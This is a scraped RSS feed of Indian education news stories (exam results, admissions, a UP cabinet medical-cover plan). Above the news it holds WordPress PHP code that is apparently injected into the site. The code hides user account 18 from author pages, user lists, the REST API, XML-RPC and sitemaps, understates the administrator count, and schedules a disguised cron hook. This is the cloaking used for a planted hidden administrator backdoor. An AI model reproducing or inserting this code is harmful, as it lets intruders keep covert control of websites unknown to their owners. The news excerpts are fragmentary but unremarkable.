add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post UP Cabinet Likely to Approve Cashless Medical Cover for Teachers and Education Staff appeared first on The Edge Media.
]]>Among the key decisions likely to be taken is a proposal to provide cashless medical treatment of up to ₹5 lakh to nearly five lakh beneficiaries. This scheme is expected to cover teachers working in government-aided secondary schools, basic education teachers, Shiksha Mitras, instructors, cooks, and their dependent family members.
The proposal, brought by the Secondary Education and Basic Education departments, aims to extend health security to teaching and non-teaching staff associated with the education system.
The cabinet agenda also includes three proposals from the Transport Department. These involve recruitment for 35 posts of Motor Vehicle Inspectors and the creation of new posts of Assistant Regional Transport Officer for road safety in all districts, along with framing new recruitment rules.
In addition, proposals from the Science and Technology Department and the Finance Department will be discussed. The agenda also includes relaxation in rules for certain brick kilns, extension of the validity period of the IT Manufacturing Policy, and two proposals from the Urban Development Department.
The cabinet is also expected to take decisions related to further land acquisition for the Jewar International Airport project.
The post UP Cabinet Likely to Approve Cashless Medical Cover for Teachers and Education Staff appeared first on The Edge Media.
]]>The post AP EAMCET Hall Ticket Released On sche.ap.gov.in appeared first on The Edge Media.
]]>Jawaharlal Nehru Technological University Kakinada, on behalf of APSCHE, conducts the AP EAMCET for admission to various colleges in both states in the fields of engineering, medicine, and agriculture.
Candidates who have applied for the AP EAMCET 2021 should check and download their hall tickets from the exam’s official website, eche.ap.gov.in.
The post AP EAMCET Hall Ticket Released On sche.ap.gov.in appeared first on The Edge Media.
]]>The post Girls outshine boys in Board exams appeared first on The Edge Media.
]]>99.13 per cent boys and 99.67 per cent girls have passed the exams this year.
There were 17,016 foreign candidates who appeared for the exams, and 99.92 per cent have passed.
PM Narendra Modi congratulated students, see the tweet here :
https://twitter.com/narendramodi/status/1421046810072817664?s=19
5.37 per cent candidates have scored over 95% on aggregate.
The board exams were cancelled this year in view of the aggressive second wave of Covid-19, and the results were announced on basis of an alternate assessment policy.
The board adopted a 30:30:40 formula to evaluate students based on the results of Class-X, XI and XII examinations respectively.
30% weightage has been given to class X and XI final results, respectively, and 40% to class XII pre-board exams
Some students were unhappy about the marking formula, and wanted that further weightage be given to class XII performance.
However the matter was settled after the marking formula was accpetd by the Supreme Court.
CBSE was the first to cancel Class XII exams on June 1; several other state boards followed.
The post Girls outshine boys in Board exams appeared first on The Edge Media.
]]>The post NATA phase 2 result out, check the details here appeared first on The Edge Media.
]]>NATA 2021 was held on July 11, in two shifts — the first from 10 am to 1 pm and the second between 2:30 pm and 5:30 pm
The NATA Phase 2 results have been announced in the form of a scorecard. It has mention the candidate’s rank and total marks obtained in the entrance exam. The scorecard of the second test will contain the marks of Test 1 as well.
Steps To Check NATA 2021 Result :
Step 1: Go to the official website of NATA- nata.in
Step 2: On the homepage, click on the link to check the result.
Step 3: Enter the log-in credentials and click on the ‘submit’ button.
Step 4: NATA score card will be displayed on the screen. Download and take its print out for future reference.
To qualify NATA 2021, candidates need to score 75 marks out of the total 200 marks. The candidates who appeared for both the first and second test must know that the separate scorecards will be issued by CoA for both tests. For candidates taking both the tests, the best marks secured in either of the tests shall be taken as the valid score for admission into BArch course.
The post NATA phase 2 result out, check the details here appeared first on The Edge Media.
]]>The post West Bengal Yields 79 Toppers In Class 10 State Board Results appeared first on The Edge Media.
]]>The conclusions are based on Class IX yearly exams and an “internal formative evaluation” of Class X’s achievement. Board president Kalyanmoy Ganguly stated that merit had been considered by incorporating prior performance.
All subjects saw a significant performance improvement. Three to four times as many students received more than 90 percent in each topic, representing a 200 percent to 300 percent increase over the previous year.
Only in mathematics does the number — with a 30% increase — appear small in contrast.
The post West Bengal Yields 79 Toppers In Class 10 State Board Results appeared first on The Edge Media.
]]>The post Karnataka SSLC exam to be held on July 19 and 22 appeared first on The Edge Media.
]]>The government decided to conduct the exam, setting aside the fear among a section of people that they would be risking the lives of children amid the COVID-19 pandemic. While most other states have decided to promote the students of Class 10th considering the constraints of Covid, Karnataka decided to hold the exam saying that it is crucial for students to select their stream.
Karnataka SSLC Exams And Covid Situation
Considering the ongoing Covid situation. the government has also arranged transportation for children to reach the exam centres.
“The Managing Director of the Transport Corporation has issued a circular allowing children to travel in buses by displaying their admission cards. Instructions have been given to ensure that no child should miss the examination for want of a vehicle,” Karnataka Primary and Secondary Education Minister S Suresh Kumar said earlier.
Also, as per reports, the teachers got in touch with parents and students and explained to them the measures the state government has taken to conduct the SSLC Class 10th exams.
The post Karnataka SSLC exam to be held on July 19 and 22 appeared first on The Edge Media.
]]>The post Delhi University Won’t Conduct Entrance Tests For Undergraduate Courses appeared first on The Edge Media.
]]>The undergraduate (UG) admissions procedure will commence on August 2, while the enrollment procedure for postgraduate (PG), MPhil, and Ph.D. programs will start on July 26. The timetable of PG entrance examinations will be published when the registration procedure is completed.
The Ministry of Education, on the other hand, has yet to make a final judgement on CUCET. The unified admission examination is part of the National Education Policy, which was enacted last year, and has been under consideration since the CBSE delayed Class XII board exams due to the Covid issue.
The post Delhi University Won’t Conduct Entrance Tests For Undergraduate Courses appeared first on The Edge Media.
]]>The post NEET PG To Be Conducted In September appeared first on The Edge Media.
]]>The post NEET PG To Be Conducted In September appeared first on The Edge Media.
]]>The post Classes Of Technology Institutes Need To Start In October appeared first on The Edge Media.
]]>The AICTE timetable was authorised by a bench of justices L Nageswara Rao and Aniruddha Bose, who stated that an exemption to the timetable is being made exclusively due to the pandemic.
The post Classes Of Technology Institutes Need To Start In October appeared first on The Edge Media.
]]>The post Delhi University Declares Results Of Open-Book Test appeared first on The Edge Media.
]]>However, DU is expected to open enrollment for entrance exam-based and postgraduate programs in the third week of July. Despite the cancellation of the class 12 board examinations, the institution is still anticipating for Central Universities Common Entrance Test (CUCET) for undergraduate admissions.
Students whose results are RA (result awaited) or AB (absent) may address the Principal of the relevant college/department/centers within 10 days of the result’s announcement.
The post Delhi University Declares Results Of Open-Book Test appeared first on The Edge Media.
]]>